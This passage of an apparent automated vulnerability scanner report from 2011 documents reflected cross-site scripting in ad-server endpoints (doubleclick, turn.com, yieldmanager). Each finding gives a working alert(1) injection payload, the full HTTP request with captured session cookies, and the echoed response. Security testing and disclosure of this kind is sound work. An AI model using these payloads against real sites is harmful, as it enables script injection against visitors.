GET /adi/interactive.wsj.com/markets_newsreel;u=;;;mc=b2pfreezone;tile=1;sz=2x94;ord=4782478247824782;&43e13"style%3d"x%3aexpression(alert(1))"6815619fe6d=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2300_NewsReel.html?baseDocId=SB10001424053111904233404576462461660747244
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 422
Date: Sat, 23 Jul 2011 04:31:24 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/h;44306;0-0;0;31680216;31596-2/94;0/0/0;u=;~okv=;u=;;;mc=b2pfreezone;tile=1;sz=2x94;&43e13"style="x:expression(alert(1))"6815619fe6d=1;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

3.23. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_newsreel

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da5f6"style%3d"x%3aexpression(alert(1))"3f1246fe48e was submitted in the u parameter. This input was echoed as da5f6"style="x:expression(alert(1))"3f1246fe48e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_newsreel;u=;;;mc=b2pfreezone;tile=1;sz=2x94;ord=4782478247824782;da5f6"style%3d"x%3aexpression(alert(1))"3f1246fe48e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2300_NewsReel.html?baseDocId=SB10001424053111904233404576462461660747244
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 419
Date: Sat, 23 Jul 2011 04:31:19 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/h;44306;0-0;0;31680216;31596-2/94;0/0/0;u=;~okv=;u=;;;mc=b2pfreezone;tile=1;sz=2x94;da5f6"style="x:expression(alert(1))"3f1246fe48e;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

3.24. http://ad.doubleclick.net/adj/N2883.132636.QUADRANTONE.COM/B5629721.18 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2883.132636.QUADRANTONE.COM/B5629721.18

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a0c9'-alert(1)-'10a8566025f was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2883.132636.QUADRANTONE.COM/B5629721.18;sz=8a0c9'-alert(1)-'10a8566025f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 36606
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 13:48:38 GMT
Expires: Sat, 23 Jul 2011 13:48:38 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
ttp://ad.doubleclick.net/activity;src=3149779;stragg=1;v=1;pid=65553367;aid=242867278;ko=0;cid=42426448;rid=42444235;rv=2;rn=2872633;";
this.swfParams = 'src=3149779&rv=2&rid=42444235&=8a0c9'-alert(1)-'10a8566025f&';
this.renderingId = "42444235";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

3.25. http://ad.doubleclick.net/adj/lfs2.lifescript/conditions [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/lfs2.lifescript/conditions

Issue detail

The value of the path request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf736'%3balert(1)//b8265541d86 was submitted in the path parameter. This input was echoed as bf736';alert(1)//b8265541d86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/lfs2.lifescript/conditions;path=bf736'%3balert(1)//b8265541d86 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=1;sz=728x90;ord=101352252258050
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 286
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 21 Jul 2011 19:22:58 GMT
Expires: Thu, 21 Jul 2011 19:22:58 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4b/0/0/%2a/y;44306;0-0;0;31210306;3454-728/90;0/0/0;;~okv=;path=bf736';alert(1)//b8265541d86;~sscs=%3f"><img src="http:/
...[SNIP]...

3.26. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ostg.sourceforge/cons_none_p71_text

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61790'-alert(1)-'fcbfe393cb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ostg.sourceforge/cons_none_p71_text;pg=/projects;psrch=0;logged_in=0;tpc=hoytllc-vcloud;tile=2;sz=;ord=2861515760451365?&61790'-alert(1)-'fcbfe393cb3=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/hoytllc-vcloud/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 341
Date: Sat, 23 Jul 2011 04:42:43 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/m;44306;0-0;0;38027281;255-0/0;0/0/0;;~okv=;pg=/projects;psrch=0;logged_in=0;tpc=hoytllc-vcloud;tile=2;sz=;;61790'-alert(1)-'fcbfe393cb3=1;~sscs=%3f">
...[SNIP]...

3.27. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ostg.sourceforge/cons_none_p71_text

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc625'%3balert(1)//e12694d7dfb was submitted in the pg parameter. This input was echoed as cc625';alert(1)//e12694d7dfb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ostg.sourceforge/cons_none_p71_text;pg=cc625'%3balert(1)//e12694d7dfb HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/hoytllc-vcloud/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 278
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 04:42:39 GMT
Expires: Sat, 23 Jul 2011 04:42:39 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/m;44306;0-0;0;38027281;255-0/0;0/0/0;;~okv=;pg=cc625';alert(1)//e12694d7dfb;~sscs=%3f"><img src="http://s0.2mdn
...[SNIP]...

3.28. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ostg.sourceforge/pg_viewvc_p88_shortrec

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1062a'%3balert(1)//19c389f15b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1062a';alert(1)//19c389f15b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ostg.sourceforge/pg_viewvc_p88_shortrec;pg=viewvc;tile=1;tpc=hoytllc-vcloud;ord=7437528464769978;sz=1x1?&1062a'%3balert(1)//19c389f15b=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hoytllc-vcloud.svn.sourceforge.net/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 342
Date: Sat, 23 Jul 2011 04:42:56 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/d;44306;0-0;0;30748661;31-1/1;0/0/0;;~okv=;pg=viewvc;tile=1;tpc=hoytllc-vcloud;sz=1x1?&1062a';alert(1)//19c389f15b=1;bsg=109738;bsg=109741;;~sscs=%3f">
...[SNIP]...

3.29. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ostg.sourceforge/pg_viewvc_p88_shortrec

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe9a9'%3balert(1)//049934a0fac was submitted in the pg parameter. This input was echoed as fe9a9';alert(1)//049934a0fac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ostg.sourceforge/pg_viewvc_p88_shortrec;pg=fe9a9'%3balert(1)//049934a0fac HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hoytllc-vcloud.svn.sourceforge.net/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 301
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 04:42:53 GMT
Expires: Sat, 23 Jul 2011 04:42:53 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/k;44306;0-0;0;30748661;255-0/0;0/0/0;;~okv=;pg=fe9a9';alert(1)//049934a0fac;bsg=109738;bsg=109741;;~sscs=%3f"><
...[SNIP]...

3.30. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35290"><script>alert(1)</script>9abbec4719c was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=35290"><script>alert(1)</script>9abbec4719c&sp=y HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: uid=4146544210108361256; pf=nZySyOPeh2ug-66f3S_YJ-08eNO3kJ_g1J0ui0giN0IO9arxyxx0God0z89jjC5u7B_Md7IXVjaLRc76_SNpoZsbEDch1o94tTK7X4mzUCMC35RnwUiMoGkJYCinoxtJgfaE0IC8cyLwhG_8rfNFZKo408BxR9uazB8jKSDnLvk; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7Cundefined%7Cundefined%7C15177%7C15177%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15177; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:00:58 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:58 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4146544210108361256&rnd=8293284759505948787&fpid=35290"><script>alert(1)</script>9abbec4719c&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.31. http://ad.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b8d"><script>alert(1)</script>02186be73ca was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=18b8d"><script>alert(1)</script>02186be73ca HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: uid=4146544210108361256; pf=nZySyOPeh2ug-66f3S_YJ-08eNO3kJ_g1J0ui0giN0IO9arxyxx0God0z89jjC5u7B_Md7IXVjaLRc76_SNpoZsbEDch1o94tTK7X4mzUCMC35RnwUiMoGkJYCinoxtJgfaE0IC8cyLwhG_8rfNFZKo408BxR9uazB8jKSDnLvk; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7Cundefined%7Cundefined%7C15177%7C15177%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15177; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:00:58 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:57 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4146544210108361256&rnd=2626437605781778254&fpid=1&nu=n&t=&sp=18b8d"><script>alert(1)</script>02186be73ca&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.32. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b090d"><script>alert(1)</script>b3e751e2978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=806254&b090d"><script>alert(1)</script>b3e751e2978=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wj]!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*<57!!!#G!$1dF!,x.^!%)<k!3/P1!'#